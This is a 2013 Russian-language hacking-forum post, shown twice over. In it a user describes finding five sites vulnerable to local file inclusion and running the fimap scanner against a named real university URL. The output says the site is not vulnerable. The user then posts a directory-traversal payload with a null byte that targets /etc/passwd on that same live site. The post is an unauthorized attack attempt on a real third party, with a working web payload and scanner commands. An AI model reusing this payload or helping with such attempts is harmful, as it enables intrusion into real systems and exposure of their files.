psihoz26
16.09.2013, 14:04
Пытался поюзать данную тулзу но к сожалению ничего не вышло
ншел 5 lfi уязвимых сайтов сую поочереди в фимап и он мне выдаёт примерно такое
Code:
C:\Windows\system32>cd C:\fimap_alpha_v09
C:\fimap_alpha_v09>fimap.py -u "http://www.lasalle.edu/grad/index.php?section="
fimap v.09 (For the Swarm)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)
SingleScan is testing URL: 'http://www.lasalle.edu/grad/index.php?section='
[09:01:15] [OUT] Inspecting URL 'http://www.lasalle.edu/grad/index.php?section='
...
[09:01:15] [INFO] Fiddling around with URL...
Target URL isn't affected by any file inclusion bug :(
C:\fimap_alpha_v09>
а LFI то явно есть
h**p://www.lasalle.edu/grad/index.php?section=../../../../../etc/passwd%00
ншел 5 lfi уязвимых сайтов сую поочереди в фимап и он мне выдаёт примерно такое
Code:
C:\Windows\system32>cd C:\fimap_alpha_v09
C:\fimap_alpha_v09>fimap.py -u "http://www.lasalle.edu/grad/index.php?section="
fimap v.09 (For the Swarm)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)
SingleScan is testing URL: 'http://www.lasalle.edu/grad/index.php?section='
[09:01:15] [OUT] Inspecting URL 'http://www.lasalle.edu/grad/index.php?section='
...
[09:01:15] [INFO] Fiddling around with URL...
Target URL isn't affected by any file inclusion bug :(
C:\fimap_alpha_v09>
а LFI то явно есть
h**p://www.lasalle.edu/grad/index.php?section=../../../../../etc/passwd%00